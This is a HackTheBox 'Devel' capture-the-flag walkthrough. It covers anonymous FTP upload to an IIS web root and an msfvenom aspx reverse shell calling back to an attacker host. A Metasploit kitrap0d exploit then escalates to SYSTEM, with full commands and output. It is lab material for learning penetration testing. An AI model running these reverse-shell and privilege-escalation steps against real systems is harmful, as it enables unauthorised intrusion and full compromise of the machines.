HackTheBox - Devel

Starting off with a nmap scan to determine open ports, thus attack vector !

$ nmap -sCV -v -n -p- -T4 --max-retries 0 --max-rate 1000 -oN nmap-devel.txt 10.10.10.5
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-06 11:30 GMT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:30
Completed NSE at 11:30, 0.00s elapsed
Initiating NSE at 11:30
Completed NSE at 11:30, 0.00s elapsed
Initiating NSE at 11:30
Completed NSE at 11:30, 0.00s elapsed
Initiating Ping Scan at 11:30
Scanning 10.10.10.5 [2 ports]
Completed Ping Scan at 11:30, 0.37s elapsed (1 total hosts)
Initiating Connect Scan at 11:30
Scanning 10.10.10.5 [65535 ports]
Warning: 10.10.10.5 giving up on port because retransmission cap hit (0).
Discovered open port 21/tcp on 10.10.10.5
Discovered open port 80/tcp on 10.10.10.5
Connect Scan Timing: About 0.30% done
---SNIP---

Nmap has found that there are two open ports on the victim machine; port 80 & 22. Navigating to the web server reveals that the default pages of IIS are in place. Alternatively, if we check the Burp response, we can see that the server header shows the server is indeed “Microsoft IIS/7.5”.

burp_index_response

Nmap has also found that the FTP service allows anonymous connection. By logging in the service, it’s revealed that the root folder of the FTP is the root folder of the IIS server. Trying to upload a file also appeared to be successful, therefore uploading a webshell¹ should allow for command execution.

devel_ftp_revshell_upload

Generating an .aspx formated reverse shell via msfvenom was a great way to get access to the system.

$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.10 lport=7001 -f aspx -o revshell.aspx

After the generation of the reverse shell, uploading it to the system via the FTP service allowed to be executed via navigating to it in the browser.

$ rlwrap ncat -lnvp 7001 
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::7001
Ncat: Listening on 0.0.0.0:7001
Ncat: Connection from 10.10.10.5.
Ncat: Connection from 10.10.10.5:49173.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>

The use of rlwrap allows the use of the arrow keys while using netcat. It is simply a read-line wrapper and is similar to the stty raw -echo ² method. This tool can be downloaded using the package manager in kali simply by typing the below.

$ sudo apt update && sudo apt install rlwrap -y

Checking systeminfo for patches, reveals that the windows 7 x86 machine was never updated meaning it is exposed to a lot of privilege escalation attacks. Copying the output of systeminfo and pasting it locally, a tool such as “Windows-Exploit-Suggester”³ could be used to check what exploits can be used to attack the system and escalate the privilages.

$ ./windows-exploit-suggester.py -i ../systeminfo.txt -d 2020-12-06-mssb.xls
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] there are now 179 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 32-bit'
[*] 
---SNIP---
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
--> [M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important <--
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

The ms10_015_kitrap0d can be used to elevate the privilages by exploiting a kernel vulnerability. Metasploit has available module which could this automatically. Repeat the same steps done to generate a generic non-meterpreter payload to create a meterpreter alternative. Afterwards, use multi/handler and set the payload you used for the generation of the reverse shell file.

$ msfconsole -q
msf5 > use multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 10.10.14.10
lhost => 10.10.14.10

msf5 exploit(multi/handler) > set lport 7001
lport => 7001

msf5 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

msf5 exploit(multi/handler) > 
[*] Started reverse TCP handler on 10.10.14.10:7001 
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.10:7001 -> 10.10.10.5:49166) at 2020-12-22 14:56:22 +0000

After obtaining the reverse shell in metasploit, session has to be backgrounded and lastly a search for kitrap0d showed the needed module.

msf5 exploit(multi/handler) > search kitrap0d

Matching Modules
================

   #  Name                                     Disclosure Date  Rank   Check  Description
   -  ----                                     ---------------  ----   -----  -----------
   0  exploit/windows/local/ms10_015_kitrap0d  2010-01-19       great  Yes    Windows SYSTEM Escalation via KiTrap0D

Lastly, using the module, setting up the session number of the meterpreter session should allow for the module to successfully complete the exploitation to escalate privileges to NT AUTHORITY/SYSTEM.

msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1

msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit

[*] Started reverse TCP handler on 10.10.14.10:7002 
[*] Launching notepad to host the exploit...
[+] Process 2964 launched.
[*] Reflectively injecting the exploit DLL into 2964...
[*] Injecting exploit into 2964 ...
[*] Exploit injected. Injecting payload into 2964...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.10:7002 -> 10.10.10.5:49169) at 2020-12-22 14:58:40 +0000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Finally, the box was completed and flags can be read.

Simple CMD aspx webshell: https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/web-backdoors/asp/cmd.aspx ↩
STTY shell command: https://renenyffenegger.ch/notes/Linux/shell/commands/stty ↩
Windows Exploit Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester> ↩